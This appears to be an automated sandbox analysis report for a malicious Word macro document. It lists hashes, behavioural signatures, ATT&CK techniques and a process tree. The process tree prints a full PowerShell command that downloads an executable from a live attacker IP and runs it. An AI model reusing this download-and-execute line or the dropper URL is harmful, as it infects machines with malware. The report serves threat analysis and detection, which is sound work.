Analysis

  • max time kernel
    152s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2022 21:40

General

  • Target

    049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598.doc

  • Size

    53KB

  • MD5

    e1c4c3d995941a2e164f01d9de516651

  • SHA1

    61d0086d0407ca77f3f7bb40c6c97cf192171412

  • SHA256

    049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598

  • SHA512

    f4dac25644f0f1db1e236719809f1ebb72ad9b4bc17064a6f25aa6855c5fdbbfa9ede6f686175cc8506e48080f4ff5484437fb32e5f059f28483bf15a384d15b

  • SSDEEP

    384:uaTW05U6z7a3ckIEuUOFB53oIw8QTisMjPHWba/Jf5U3ySBadi+AHtnaCIBrGZ0L:Zi+Z0mHW2laH+aaZBmEx7vd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://136.243.237.222:8080/hhacz45a/mnnmz.php

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4700
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','C:\Users\Admin\AppData\Local\Temp\pJIOfdfs.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\pJIOfdfs.exe';
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4548

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1964-139-0x0000000000000000-mapping.dmp
  • memory/4548-144-0x00007FF803CF0000-0x00007FF8047B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4548-143-0x00007FF803CF0000-0x00007FF8047B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4548-142-0x00007FF803CF0000-0x00007FF8047B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4548-141-0x0000021C94B30000-0x0000021C94B52000-memory.dmp
    Filesize

    136KB

  • memory/4548-140-0x0000000000000000-mapping.dmp
  • memory/4700-135-0x00007FF7EFBB0000-0x00007FF7EFBC0000-memory.dmp
    Filesize

    64KB

  • memory/4700-138-0x00007FF7ED250000-0x00007FF7ED260000-memory.dmp
    Filesize

    64KB

  • memory/4700-137-0x00007FF7ED250000-0x00007FF7ED260000-memory.dmp
    Filesize

    64KB

  • memory/4700-136-0x00007FF7EFBB0000-0x00007FF7EFBC0000-memory.dmp
    Filesize

    64KB

  • memory/4700-132-0x00007FF7EFBB0000-0x00007FF7EFBC0000-memory.dmp
    Filesize

    64KB

  • memory/4700-134-0x00007FF7EFBB0000-0x00007FF7EFBC0000-memory.dmp
    Filesize

    64KB

  • memory/4700-133-0x00007FF7EFBB0000-0x00007FF7EFBC0000-memory.dmp
    Filesize

    64KB